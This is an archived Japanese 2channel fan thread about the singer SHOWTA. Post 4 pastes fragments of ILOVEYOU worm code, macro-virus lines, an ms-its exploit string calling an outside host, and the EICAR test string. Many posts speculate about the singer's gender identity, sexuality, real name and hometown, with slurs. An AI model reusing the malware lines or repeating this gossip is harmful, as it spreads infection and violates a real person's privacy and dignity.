2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【天使の歌声】SHOWTA.

1 :NO MUSIC NO NAME:2006/08/21(月) 09:48:28 ID:9rX0aiIh
2004年ヤマハ・ティーンズ・ミュージック・フェスティバル(TMF)に出演し、地方大会、全国大会を含め高い評価を得、数々(*)の賞を受賞。
オリジナルの楽曲での参加者が多い中、SHOWTA.はただ一人既成曲を歌う形でエントリー。まさに声だけで多くの人から賛同を得た。
SHOWTA.の持つ歌声は、多くの人々の心に沁み込み、感情を揺さぶる。時にはその歌声に涙し、時にはその歌声にそっと励まされる。
女性とも男性ともとれるその歌声は、年齢、性別を超越した、まさに天使の歌声と呼ぶに相応しい。
*福井県大会 奨励賞受賞、うたパラ2004ティーンズ大賞受賞、東海北陸大会ティーンズ大賞オーディエンス賞W受賞(全て2004年)

公式応援サイト
http://www.showta.jp/top/

2 :NO MUSIC NO NAME:2006/08/21(月) 10:07:02 ID:a0Vsd9RX
すげぇな
女かとおもた

3 :NO MUSIC NO NAME:2006/08/21(月) 10:30:43 ID:6ph1owFl
昨日ラジオゲストで出ていて初めて知ったよ

ラストまで女だと思ってた
自分の事を『僕』と言ってるなんて狙ってんなぁ‥なんて思った俺バカス…

19男の声じゃねえよな

4 :NO MUSIC NO NAME:2006/08/21(月) 18:38:47 ID:w/f+i9W2
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

5 :NO MUSIC NO NAME:2006/08/22(火) 19:24:03 ID:yhYmXz6I
CDかった。マジ声がスゴい!!


6 :NO MUSIC NO NAME:2006/08/23(水) 14:06:53 ID:mCYWAWYL
8/28 MBS「MUSIC EDGE」ゲスト出演
この番組はLiveあるの? 
見たいけど映らないよーーーー

7 :NO MUSIC NO NAME:2006/08/23(水) 17:15:07 ID:QOvxLRuD
24時間テレビの金沢のゲストに!!
でもお笑いさんばっかりなので同姓同名?(アルファベットだけど)

8 :NO MUSIC NO NAME:2006/08/23(水) 19:34:43 ID:XerZ8L7c
27日はTMF2006 石川福井決勝大会もあるから
何回見れるんだよ! 金沢ファンいいなぁーーー

9 :NO MUSIC NO NAME:2006/08/23(水) 20:27:40 ID:qhplhpwO
よく作る自炊料理は酢豚!(ただし豚バラ使用)

かなりのゲーム好き(ロープレ)朝起きると、まずゲームのスイッチを入れる
おのぼりさんなので友人と街に出ると、あちこち珍しいモノを指差してしまう(友人に止めてくれと言われる)

東京は高い建物が多くて空が狭い…

てな事をラヂオで言ってたな
なかなか好感の持てる人だった


10 :NO MUSIC NO NAME:2006/08/23(水) 20:55:07 ID:XerZ8L7c
>>9
いつのラジオか分からないけどレポありがとう!
地方なので聞けるラジオが限られてるの、うれしいよー

11 :NO MUSIC NO NAME:2006/08/24(木) 09:33:50 ID:qBHPuN6c
TVでも何でもいいから歌ってるとこ見たい。

12 :NO MUSIC NO NAME:2006/08/25(金) 07:47:11 ID:cSYkNzxW
なんか純粋そー っていう印象

13 :NO MUSIC NO NAME:2006/08/25(金) 11:46:02 ID:YX82fbnV
これから、田舎から出てきた純粋な子が、ドンドン薄汚れてスレてゆく様が見られるのですね
(´・ω・`)

14 :NO MUSIC NO NAME:2006/08/25(金) 21:55:48 ID:pHisdUp4
最近気になってCD買ってみた(・∀・)
これから癒しの一枚になりそうだよ

15 :NO MUSIC NO NAME:2006/08/25(金) 22:10:42 ID:/aebAyV9
「ホタル」の高音、ファルセットと地声の連続ってすごいよね。

16 :NO MUSIC NO NAME:2006/08/26(土) 10:46:17 ID:enCWJU4E
テレビ金沢 AM11:45の番宣に映るのかなー。
だれかレポしてくだせー。

17 :NO MUSIC NO NAME:2006/08/26(土) 14:05:43 ID:Lb9EgXCD
ttp://www.showta.jp/top/
既出?

18 :NO MUSIC NO NAME:2006/08/27(日) 13:23:29 ID:NGTuo1Z3
>>17
うん☆

ラジオで「あれまぁ!」ってw 
「誕生日」を一瞬「クリスマス」って言いそうになって、かわええの〜♪

パンツ上等! やっぱ19歳男子なのねー、ちと安心w

19 :NO MUSIC NO NAME:2006/08/29(火) 01:39:48 ID:LqfVkNzb
今テレビで始めて見て来ました。 オカマキメーーーーーーw

20 :NO MUSIC NO NAME:2006/08/29(火) 01:41:52 ID:PbWlqKX4
それを言うのであれば「初めて」じゃないの?
低学歴って哀れだね。

21 :NO MUSIC NO NAME:2006/08/29(火) 03:02:40 ID:7ZRodttB
>>20
どちらでもいいと思うがそれは。

22 :NO MUSIC NO NAME:2006/08/29(火) 09:21:51 ID:e3DKhEXd
うぅぅぅー見たかった。けど、映らない地方なのよね(´・ω・`)
何と言われようが話題になる事が今は大事だと思いたい。

23 :NO MUSIC NO NAME:2006/08/29(火) 12:00:03 ID:6RHXMIwg
blogが正直きもい件について

24 :NO MUSIC NO NAME:2006/08/29(火) 14:35:18 ID:XQIm6YIc
そかなー。blog好きなんだけどw

それよかBBSが少しまともになってきて安心。
前はメンタル板かと思ったよ。ポエマーもいたしな。
今はリアル消防うざーーーーーーーー

25 :NO MUSIC NO NAME:2006/08/29(火) 14:48:57 ID:Fa2yYMg/
FMで流れていて初めて聞いた。
気になって調べたらこの人だった。
女性かと思ったよ。
この先どう変化していくか楽しみです。

26 :NO MUSIC NO NAME:2006/08/29(火) 16:46:27 ID:1HTIeqoZ
僕のすべてだけじゃ足りないんだ たぶん

この「たぶん」が余計に悲しい。

27 :NO MUSIC NO NAME:2006/08/29(火) 21:09:12 ID:26QjTBEj
8/28 M-EDGE

アップローダー(´ー`)ノ⌒θ100
shine31617.avi P=1000

音声無圧縮なので70Mありますが置いていきますノシ

28 :NO MUSIC NO NAME:2006/08/29(火) 22:47:35 ID:1HTIeqoZ
>>27
神よありがとうーーーー☆
モニターに手を会わせたよ。ついでに撫でておいたよ!

SHOWTA.の熱唱マジ泣けてきた・・・つか関西だけなんてヒドイ!!

29 :NO MUSIC NO NAME:2006/08/30(水) 22:42:16 ID:h1KC72Ru
9月1日のテレビユー福島「VJパロパロ」
スタジオライブって書いてあんだけど!! 
ちょっとーまた見れないよ・・・  (´・ω・`)


30 :NO MUSIC NO NAME:2006/08/31(木) 20:00:33 ID:6rLYjbWo
パロパロ見たい・・・ (´;ω;`)ブワッ
コメント出演は我慢できる。でもライブは見たいの。

31 :NO MUSIC NO NAME:2006/09/01(金) 09:27:34 ID:Lg2O48QM
女性ホルモンでもうってるんじゃねーの?こいつ

32 :NO MUSIC NO NAME:2006/09/02(土) 00:48:43 ID:hFeeBzz4
声と容姿がコンプレックスだったが、友人とカラオケに行ったとき凄く感動してくれて
こんな自分でも人を感動させる事ができるんだと気づいたのが
この世界にはいるきっかけになったて何かで見た。

33 :NO MUSIC NO NAME:2006/09/02(土) 01:48:51 ID:EWG/dyYj
>>29地元だからパロパロ見たよ!まじかわいかった(*´д`)ハァハァ

34 :NO MUSIC NO NAME:2006/09/02(土) 08:16:42 ID:a0149s4p
>>33
激しく羨ますぃーーーー! レポしてくれたら嬉しいな☆
服装とか、何かトークはあったの? あとセットとか。
なんか公式では質問したくない気分なのだw

>>32
人前で声を出すことが怖くて・・・ (´;ω;`)ブワッ
本人にしか分からない深い悩みだったんだろうね・・・ 

35 :NO MUSIC NO NAME:2006/09/04(月) 22:49:05 ID:8QpDF5X0
この人純粋に男の人なの?
エーベックスの中村中系の人かと思った

36 :NO MUSIC NO NAME:2006/09/09(土) 23:35:14 ID:afE+ZgHX
カストラートみたいなもんかね

37 :NO MUSIC NO NAME:2006/09/09(土) 23:36:30 ID:BKWfm5Tu
くるくるドカンきたあああ

38 :NO MUSIC NO NAME:2006/09/09(土) 23:38:43 ID:hF4RJIJk
消えてしまう〜♪

結構好きかも

39 :NO MUSIC NO NAME:2006/09/09(土) 23:42:10 ID:w9vxwsTx
>>38
ようこそ、SHOWTA. Worldへw

40 :NO MUSIC NO NAME:2006/09/10(日) 16:58:03 ID:mH2gxIvi
デビュー前に見たんだけど、茶髪でネイルしてたょ。
私そのときの方が今よりおんなっぽくて好きだった〜☆

見とれてましたモノ。。。

41 :NO MUSIC NO NAME:2006/09/11(月) 13:25:13 ID:lxwhGJUq
くるくるドカン見てCD買ってみた。
かなりイイね、癒されたよWw

42 :NO MUSIC NO NAME:2006/09/12(火) 22:58:45 ID:m9bW5dqL
Duetの生写真欲しい。ハガキ出さなきゃ!

43 :探偵s:2006/09/13(水) 00:29:05 ID:GZ4qBSjM
あのこって性同一性障害だよね?
まもってあげたいって感じw

44 :NO MUSIC NO NAME:2006/09/13(水) 08:18:57 ID:XKLmftb6
そうなの? 歌聞いてると癒されるし、どうでもいいやw

45 :探偵s:2006/09/14(木) 00:44:57 ID:J4gQzUpZ
本人もそれをカミングアウトしたいみたい・・・
隠したくないみたいよ?

46 :NO MUSIC NO NAME:2006/09/14(木) 00:47:04 ID:yOCEYa2S
mjd?

47 :探偵s:2006/09/14(木) 01:16:56 ID:J4gQzUpZ
でもまだみたい
あのこが化粧して東京あるいてるの見たわ


48 :NO MUSIC NO NAME:2006/09/16(土) 10:59:39 ID:qtNKNL8R
フォレストでSHOWTA.応援ページあったのはガイシュツ?

49 :NO MUSIC NO NAME:2006/09/16(土) 11:28:50 ID:s5HPtiR5
>>48
そういえば、でてないね。
ホイっ! ttp://id.fm-p.jp/showta./
私もこのサイトで知ったんだった。
ギャラリーのメイク中の横顔、すごい美人さん☆

50 :NO MUSIC NO NAME:2006/09/17(日) 01:42:18 ID:6TrWsGSU
なんでSHOWTAなの?本名「柳川 昇」じゃん!

51 :NO MUSIC NO NAME:2006/09/17(日) 13:58:34 ID:Yr9ncmHI
Gayoの植村花菜さんのLive、映ってるお客さんがSHOWTA.に見える。
でもセンターの一番前って無いよね。
こりゃ私、病気だなw

52 :NO MUSIC NO NAME:2006/09/17(日) 16:57:11 ID:ijyNxI2+
>50
苗字はしらんが昇は違うよ
そう名乗ってただけ

53 :www:2006/09/18(月) 23:41:49 ID:Rii9/uqj
彼氏いるってうわさ

54 :NO MUSIC NO NAME:2006/09/18(月) 23:52:54 ID:bFNOGAbM
天使の喘ぎ声

55 :www:2006/09/19(火) 12:52:33 ID:w4nZbYtb
目整形してない!?いまおもった・・・

56 :NO MUSIC NO NAME:2006/09/21(木) 01:36:02 ID:q+Ve30j2
>>50 本名は柳川しょうただよ。んでまだ高校通ってたときくらいに改名して柳川昇になったんだよ。辞めちゃったけど同じH高やった元カノがゆうんやから間違いないよ

57 :www:2006/09/21(木) 02:37:49 ID:lsK6a1TK
彼氏のまちがいじゃないの?
たぶん女とつきあったなら隠すためよ

58 :NO MUSIC NO NAME:2006/09/21(木) 03:06:14 ID:itsIa1aW
>>56の元カノってことでしょ

59 :NO MUSIC NO NAME:2006/09/23(土) 12:31:46 ID:UOkw5x6s
ttp://www.odoroku.tv/vod/000000706/index.html
ちょびっとだけどコメント見れる。
10月1日までなので急げ!

60 :NO MUSIC NO NAME:2006/09/27(水) 20:42:57 ID:gYcVT6cz
新曲キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

61 :NO MUSIC NO NAME:2006/09/28(木) 13:12:00 ID:XVsrn0F5
w-inds.の劣化版崇拝スレはここですか?

62 :NO MUSIC NO NAME:2006/09/28(木) 22:04:48 ID:vo6eXFum
公式BBS酷すぎ。
だれもあんたらの職業なんて興味ないし。探るヤシが一番悪いんだけど。
頼むから自分でファンサイトでも作ってくれ。
なんでもいいからネットマナーを読め。書込み頻度の異常さに気づいてよ。

63 :NO MUSIC NO NAME:2006/09/29(金) 16:00:02 ID:uwAAXwMP
ログの流れが早い。活気があっていいのかなー。
カキコしづらいけどw

64 :www:2006/10/01(日) 22:42:33 ID:SNvYsLok
このまえ渋谷でもたわ

65 :NO MUSIC NO NAME:2006/10/03(火) 06:40:58 ID:9vOuHG20
このまえ渋谷でもたわ
このまえ渋谷で、もたわ
このまえ渋谷でもた、わ


66 :NO MUSIC NO NAME:2006/10/07(土) 09:31:21 ID:RjLLWkjk
新曲サビが頭の中でクルクルする☆

67 :NO MUSIC NO NAME:2006/10/10(火) 22:55:45 ID:32Hf0sx9
>>51
レコ社同じだからありうると思う。

68 :www:2006/10/11(水) 00:01:05 ID:IJz1yocD
せいどういつせいしょうがい

69 :NO MUSIC NO NAME:2006/10/13(金) 18:50:43 ID:+ghcLKZ/
>>67
あのライブ収録はデビュー前なんだよね。
意味深にも客のドアップはそのワンカットだけなの。
あとは引きの映像で後頭部ばかり。
うん、私の中であれはSHOWTA.ということにしとくw

70 :NO MUSIC NO NAME:2006/10/21(土) 18:41:03 ID:hsnjVUtS
福井のWAVEでストアイベントだって! 
ttp://www.waveweb.co.jp/news/index.php

71 :NO MUSIC NO NAME:2006/10/21(土) 18:46:04 ID:hsnjVUtS
今更な記事だけど

ttp://music.livedoor.com/article/detail-2697.html

ttp://www.sponichi.co.jp/osaka/ente/200608/21/ente196540.html

72 :NO MUSIC NO NAME:2006/10/30(月) 06:43:03 ID:Ott1CYH9
この人なんなの?調子乗りすぎじゃない?
ティーンズ見に行ってゲストで着てたんですけど、「こうださんより僕の方がいいなあって思った人手あげてください。」
とか公の前で言うことじゃないでしょ?
「この曲よりこの曲のほうがいいって思った人手あげてください」とか。
お前が作った曲じゃないだろ?ってかんぢなんだけど・・・。
まじで調子のりすぎ。でてくんなよってかんぢ。

あげくのはてに「この曲知らない人いる?みんなしってるよね。」とかいって歌い始めるし。
お前自体しらねーよってかんじ・・。あほなの?このひと。

73 :NO MUSIC NO NAME:2006/10/31(火) 17:23:20 ID:UVjD6LOU
>>72
行けなかったんで、MCの内容が分かってチョット嬉しい。
72さんには悪いが。



74 :NO MUSIC NO NAME:2006/11/05(日) 00:13:46 ID:xLA4uYud
>>72
多少の思い上がりはあるだろうけど、単なるウケ狙いとかだったんじゃないの?

75 :wwwjgy:2006/11/05(日) 01:43:39 ID:S1kYgDL3
あたしもそうおもうわよ。
なんかいけすかないけれど

76 :NO MUSIC NO NAME:2006/11/05(日) 02:10:51 ID:mEp8v4y1
私もウケ狙いだったと思う。SHOWTA.のファンなら倖田來未さんの大大大ファンだって知ってるし。
でもそんなの知らない人が聞いたら「はぁ?」って思うかもね。



77 :NO MUSIC NO NAME:2006/11/05(日) 02:55:46 ID:rGZaybbl
この人、男が好きなの?

78 :NO MUSIC NO NAME:2006/11/05(日) 12:53:10 ID:xLA4uYud
そうなの?

79 :NO MUSIC NO NAME:2006/11/05(日) 17:23:41 ID:rGZaybbl
どうなの?

80 :NO MUSIC NO NAME:2006/11/05(日) 23:30:53 ID:5k1imIp5
正真正銘ね。だって彼氏いたし。

81 :NO MUSIC NO NAME:2006/11/06(月) 19:36:35 ID:y+0r81nS
超キモいね〜(ハート

82 :NO MUSIC NO NAME:2006/11/06(月) 21:24:27 ID:C6eHtb5y
まあ男のなりかけか

83 :NO MUSIC NO NAME:2006/11/06(月) 21:51:21 ID:88LO6C2x
公式BBSさ、みんなスルーして下に流していけばいいのに。
荒らしにいちいち反応する人も、言い方悪いけど荒らしだと思うよ。

あと、いい加減捨てアド取れって言いたい! 誰とは言わないけどw

84 :NO MUSIC NO NAME:2006/11/08(水) 21:11:18 ID:9agYFsda
でも可愛らしいわね
あたしみたいなオカマは大好き。

85 :NO MUSIC NO NAME:2006/11/08(水) 21:27:27 ID:LRRy+uXX
巣に帰って

86 :NO MUSIC NO NAME:2006/11/10(金) 00:14:06 ID:p5Uj926x
ささささぁー
かえることができなかったわ。申し訳ない。


87 :NO MUSIC NO NAME:2006/11/10(金) 15:47:16 ID:X1yHBDrU
>>51
>>67
>>69
植村花菜ファンで当日会場にいましたけど、別人です。
きれいな女性の方です。

88 :NO MUSIC NO NAME:2006/11/10(金) 20:08:47 ID:1xchEcfZ
>>86
なんか、かわいい

89 :NO MUSIC NO NAME:2006/11/11(土) 12:33:54 ID:+qVyUFAT
FM OSAKA 先週が「S=SNOW」で今週は何だったのですか?
どなたか聞かれた方、教えて下さい。

90 :NO MUSIC NO NAME:2006/11/13(月) 00:18:35 ID:JSnnz+Tx
trans-winterって、トランスジェンダーと掛けてるの?

91 :NO MUSIC NO NAME:2006/11/13(月) 17:15:31 ID:cyHmhV1e
こいつキメェ

92 :NO MUSIC NO NAME:2006/11/13(月) 21:05:24 ID:YF1TuvrB
お前よりはキモクないよ多分

93 :NO MUSIC NO NAME:2006/11/14(火) 01:54:24 ID:Yhp9oN3i
ttp://id.fm-p.jp/showta1/images/mobile_l/cdjacket.jpg

天使だってさ。

94 :NO MUSIC NO NAME:2006/11/14(火) 19:55:06 ID:UCnn4P4+
>>93
これを不細工にすれば漏れみたくなる

95 :NO MUSIC NO NAME:2006/11/14(火) 21:03:38 ID:HTMtkoRZ
>>93
なんか、ちょっと

96 :NO MUSIC NO NAME:2006/11/14(火) 22:30:05 ID:Yhp9oN3i
これより不細工な>>94禿乙

97 :NO MUSIC NO NAME:2006/11/14(火) 22:50:28 ID:UCnn4P4+
新曲のジャケット写真を見ると、>>93のころよりは少し痩せてるな

98 :NO MUSIC NO NAME:2006/11/14(火) 23:21:49 ID:Yhp9oN3i
今度は斜めだからじゃね?
真っ正面って不細工に写るんだよなぁ。

99 :NO MUSIC NO NAME:2006/11/15(水) 16:29:59 ID:WZRZDihe
公式TOPの草原に立ってる写真、
中村中のイメージフォトにそっくりだな

100 :NO MUSIC NO NAME:2006/11/16(木) 02:51:33 ID:Wr/C5Zj1
中性的な声なんか年取ったら変わるよ。今のうちに作品残した方がいいな。
小田和正並の迫力はないゲド

101 :NO MUSIC NO NAME:2006/11/19(日) 06:55:07 ID:82U3AMuM
若き日の藤原達也に似てるきがす。
アレもホルやってたらこんな感じなんかね。

102 :NO MUSIC NO NAME:2006/11/19(日) 19:07:54 ID:vKCfqdY6
私はBoAに見える時があるよ(笑)
またMusicEdgeがあるね・・・神降臨してくれるかな・・・

103 :NO MUSIC NO NAME:2006/11/22(水) 17:52:45 ID:7kldFIUI
シングル買ったぜー。
カレンダーもらった。

104 :NO MUSIC NO NAME:2006/11/22(水) 21:55:33 ID:TFRqfwFB
やっぱり女ホルか…?

105 :NO MUSIC NO NAME:2006/11/22(水) 21:59:04 ID:L2dS+6h9
この子って戸籍女でしょ?

106 :NO MUSIC NO NAME:2006/11/24(金) 04:16:01 ID:gN4bDtkL
え?戸籍女で性同一性障害なの?

107 :NO MUSIC NO NAME:2006/11/24(金) 10:55:01 ID:esifjLIm
男でしょ。そんでもって性同一性障害。

108 :NO MUSIC NO NAME:2006/11/24(金) 19:01:34 ID:hxKtCVSS
女で性同で男になりたいんだと思ってたが、女になりたい男なの?
プロモとかオフ写真見ても身体が♀にしか見えないし
明らかに乳ある

109 :NO MUSIC NO NAME:2006/11/24(金) 22:37:26 ID:+pbA3rVV
女だったら本名が「のぼる」ってことはないでしょ。

110 :NO MUSIC NO NAME:2006/11/24(金) 22:51:24 ID:1J0D7HR7
>>109
事務所と契約する前に改名済みだったら女でものぼるって名前はあり得る。




つーか性同一性障害だとか本当は女だとか、そんなこと詮索して何になるの?

111 :NO MUSIC NO NAME:2006/11/25(土) 03:21:51 ID:HLJO0P7P
男になりたい願望がある女の子でああいう雰囲気の子はいないよ。
実際のFTMの人を見れば分かる。

ま、110に同意だな

112 :NO MUSIC NO NAME:2006/11/25(土) 20:35:05 ID:YRNS07SW
そうそう。FtMだったら女っぽさを売りにはしないはず。

113 :NO MUSIC NO NAME:2006/11/26(日) 08:44:34 ID:M9n04Ak4
ブログの写真の下半身が女っぽいね。でも誰も確信がもてないなんて。不思議。ミステリアス。

114 :NO MUSIC NO NAME:2006/11/27(月) 16:35:51 ID:6T5NBQ+H
普通に男だ。

115 :NO MUSIC NO NAME:2006/11/27(月) 17:42:31 ID:DDkZQi5t
どう見ても男の子にしか見えませんお(^ω^)

116 :NO MUSIC NO NAME:2006/11/27(月) 19:48:05 ID:Zle1YrYQ
中村中と仲が良いってんだし2人とも♂>♀タイプのオカマじゃねーの?

117 :NO MUSIC NO NAME:2006/11/29(水) 08:57:50 ID:awUFr332
19歳の男だよ
中学生の頃自分だけ声変わりしなくてあまりしゃべらなかったって雑誌に載ってた

118 :NO MUSIC NO NAME:2006/11/29(水) 16:56:46 ID:aNaPNUWc
中村中とはティーンズつながりで仲いいだけかな?でも前ブログに泊まったとか書いてなかった?違ったらスマソ。堂々交際かと。

119 :NO MUSIC NO NAME:2006/11/29(水) 20:03:09 ID:Nz4ONVKP
中村中のブログ見てたらSHOWTAとの写真が。
しかも中村中よりSHOWTAの方が可愛い。
ttp://www.nakamura-ataru.jp/blog/images/20061127/nonn.jpg

ゲイではないが、SHOWATAならいいとオモタ。向こうは嫌だろうけど。


120 :NO MUSIC NO NAME:2006/11/29(水) 21:19:40 ID:Lg7buHcI
どうでも良いけど>>119
ショワターッってなんか北斗の拳っぽいよなw

SHOWTAは可愛い男の子って感じだね。

121 :NO MUSIC NO NAME:2006/11/30(木) 15:02:09 ID:yIMBWILg
ttp://id.fm-p.jp/showta1/images/mobile_l/cdjacket.jpg

村上ショージ

122 :NO MUSIC NO NAME:2006/12/02(土) 21:17:12 ID:SYyIKn1+
どうでもいいが
俺の友達の友達がこのSHOWTAでよく遊ぶらしい
とりあえず本名は>>56が正解
高校の時からテニス強くて有名だった

123 :NO MUSIC NO NAME:2006/12/03(日) 01:50:11 ID:IMD4nxdc
中村中より顔でかい

124 :NO MUSIC NO NAME:2006/12/03(日) 02:35:50 ID:JAVrIuK+
12月24日(日)FM三重レディオキューブ公開録音
ウラヤマスィ・・・。

125 :NO MUSIC NO NAME:2006/12/03(日) 22:39:21 ID:qAYelRox
イベントの時、股間のもっこり具合がすごかったよ?

126 :NO MUSIC NO NAME:2006/12/04(月) 01:15:04 ID:oe9UybH+
???????

127 :NO MUSIC NO NAME:2006/12/04(月) 10:37:13 ID:tKiUWCZU
可愛い顔してババンバンって奴だな。

128 :NO MUSIC NO NAME:2006/12/05(火) 14:34:16 ID:WAMBMrXi
>>125
お前の方がすごいよ!ウホッ!

129 :NO MUSIC NO NAME:2006/12/07(木) 13:51:43 ID:TS4hhgxL
w-inds.を最初に歌番組で見た時「これは男だよな?」とオモタが、今はフツーに男っぽい。

SHOWTA.もそうなるのかと思ったがこの人もう19なんだよね、どうなるんだろう?青年期になって男っぽさが出てこないとだんだんキモくなるからなー。
中性的でも西川みたいにいい案配でバランス取れているのもいるしまだわからないが。

130 :NO MUSIC NO NAME:2006/12/09(土) 00:37:27 ID:penSK1BY
ドラマの挿入歌になったから売れるかと思ったけど微妙なまま終わったな

131 :NO MUSIC NO NAME:2006/12/09(土) 01:59:17 ID:XwmL2s4b
アッー!

132 :NO MUSIC NO NAME:2006/12/10(日) 02:25:04 ID:WSzFYjRQ
>129
オネエMANS系の人は年取っても男っぽくならないよ

133 :NO MUSIC NO NAME:2006/12/10(日) 15:21:41 ID:EYqRfRbn
どう聴いても男の声にしか聴こえん・・・

134 :NO MUSIC NO NAME:2006/12/10(日) 20:47:53 ID:UGhgwPFy
でも近い感じの声の女の人はいるしなぁ・・・

135 :NO MUSIC NO NAME:2006/12/11(月) 03:00:53 ID:JTW3lHh8
男の声なんだから男の声に聞こえるのは当たり前かと・・・。

136 :あや:2006/12/12(火) 03:00:13 ID:VDDfKET1
おめぇら、SOHWTA.の苦労もしらないで悪口言うなよ!!!だいたいSHOWTA.ゎ男だし!!
自分に自信がないからってふざけるのも、いいかげんにしろってんだよ!!!
ガキ!

137 :NO MUSIC NO NAME:2006/12/12(火) 11:16:34 ID:Pkfjq0gq
日本語かけるようになってから出直してきて下さい。

138 :NO MUSIC NO NAME:2006/12/12(火) 19:37:32 ID:eVT2gzPa
聞けないラジオにもメールするのって普通?

139 :NO MUSIC NO NAME:2006/12/12(火) 19:46:11 ID:nPaDrN27
キミと〜こうしてー 出会え〜たコト〜♪ ってとこのメロディが好き

歌い方が素直な感じなのが良いね。最近くどいっつかクサイ歌い方の人ばっかで疲れるし飽きる
まぁでもこの人も段々とクサイ歌い方になっていきそうではあるわな
それまでは聴くよ

140 :NO MUSIC NO NAME:2006/12/14(木) 00:37:38 ID:HRTqCJiL
ヘアスタイルが女っぽい

141 :NO MUSIC NO NAME:2006/12/15(金) 12:34:14 ID:Jb4glujM
w-inds.の慶太の初期の声に 激似だと思った。綺麗な声だね。


142 :NO MUSIC NO NAME:2006/12/16(土) 02:38:44 ID:JDZGREI3
中村中とは性同一性障害つながり

143 :NO MUSIC NO NAME:2006/12/16(土) 02:42:53 ID:4y6fmcgs
この人はなにをオカズにオナニーするんですかね?

144 :NO MUSIC NO NAME:2006/12/16(土) 03:30:54 ID:lPkziE0w
この子って声変わりしたの?
してなかったら大変だよねこれから

145 :NO MUSIC NO NAME:2006/12/16(土) 03:41:50 ID:C3i3E44V
女だと思ってた

146 :NO MUSIC NO NAME:2006/12/16(土) 03:43:27 ID:ujl1cEZd
TVで顔アップ見たけど
ヒゲがほんのーり見えた。やっぱ男なのね。

しかも、目標が「倖田來未」って・・・。

147 :NO MUSIC NO NAME:2006/12/16(土) 04:42:37 ID:5yFMZcSw
女でも男ホル注射すればヒゲ生えるよ

148 :NO MUSIC NO NAME:2006/12/16(土) 07:28:36 ID:rXHQtwNA
指とか見る限り男っぽいんだけどなあ・・・
声変わりしてないただのアッー!なだけだと思う。

149 :NO MUSIC NO NAME:2006/12/16(土) 10:05:17 ID:edT8Yd4j
そういえば明日 地元にショウタくるな。ラジオで宣伝されてた。

150 :NO MUSIC NO NAME:2006/12/16(土) 11:05:34 ID:oRwIC79H
>>149
生歌聞けるチャンスだね!行ったらレポよろしく。

151 :NO MUSIC NO NAME:2006/12/16(土) 15:42:06 ID:znrFSbxX
性同一性障害?
男だけど中身女ってこと?
半陰陽?
生殖能力あるの?

152 :NO MUSIC NO NAME:2006/12/16(土) 17:36:37 ID:VzmX9ekJ
音楽戦士可愛かった(*´艸`)

153 :NO MUSIC NO NAME:2006/12/16(土) 18:26:06 ID:sQGgXOOl
今日宇都宮のミニライブ行ってきた。
意外に肌焼けててビックリwもっと消え入りそうな雰囲気かと思ってたw
でも歌声はホントきれいだわ。素直にすげーと思った。
トークではミニライブで行く先々でスタッフを含めその土地の名物を
食べていると言ってました。

154 :NO MUSIC NO NAME:2006/12/16(土) 19:22:24 ID:Bg1r6JZe
おぉレポ、ありがd!
肌焼けてたんだ!メイクでなくて?
本物って細っいよねー、顔も小さくてさ。

155 :NO MUSIC NO NAME:2006/12/16(土) 21:46:33 ID:D5opDspF
TVではじめて見て、声より見た目と身振り手振りに驚いた
ホントに男の子?って
歌は同じハイトーンとしてKATSUMIの時ほど衝撃はなかった



156 :NO MUSIC NO NAME:2006/12/17(日) 00:52:02 ID:FKv79ALj
>>144
中3のときにしたらしい。
その前はもっと高かったってさ

157 :NO MUSIC NO NAME:2006/12/17(日) 17:27:59 ID:jmpLlOX6
音楽戦士放送されてない地域(´・ω・`)ショボーン
来年のPOPJAMまでお預けだ・・・

158 :ちゅん:2006/12/18(月) 02:47:39 ID:0fB3M3+C
結局性同一性障害なんですか?
それが本間に気になる。

159 :NO MUSIC NO NAME:2006/12/18(月) 08:54:38 ID:YeHzq29v
違うみたいだよ。ただ女の子っぽいだけ。

160 :NO MUSIC NO NAME:2006/12/18(月) 11:54:48 ID:ODPS2b54
いや、多分確定だな。俺地元同じだがこいつ女の格好してた。男と歩いてるのも何度かみたことがあるな

161 :みぃ:2006/12/18(月) 17:00:32 ID:0fB3M3+C
160さん
まぢですか?笑¨
地元福井のどこらへんなんですか?

162 :NO MUSIC NO NAME:2006/12/18(月) 17:08:10 ID:3Dp1kcvw
名前の最後にドットつけるのは縁起悪いからやめた方がよくね?

163 :NO MUSIC NO NAME:2006/12/18(月) 19:08:51 ID:mm17lYs6
>>160
腕組んでたとか指絡めてたならともかく男友達くらい普通にいるだろ

164 :NO MUSIC NO NAME:2006/12/18(月) 20:51:55 ID:NE5F5uiA
>>155
katsumi って何のアルバムでハイトーン聴ける?

165 :NO MUSIC NO NAME:2006/12/18(月) 22:59:35 ID:ODPS2b54
彼氏がいるとか地元では有名な話だぞ笑

166 :NO MUSIC NO NAME:2006/12/19(火) 17:09:45 ID:pzmRpyGG
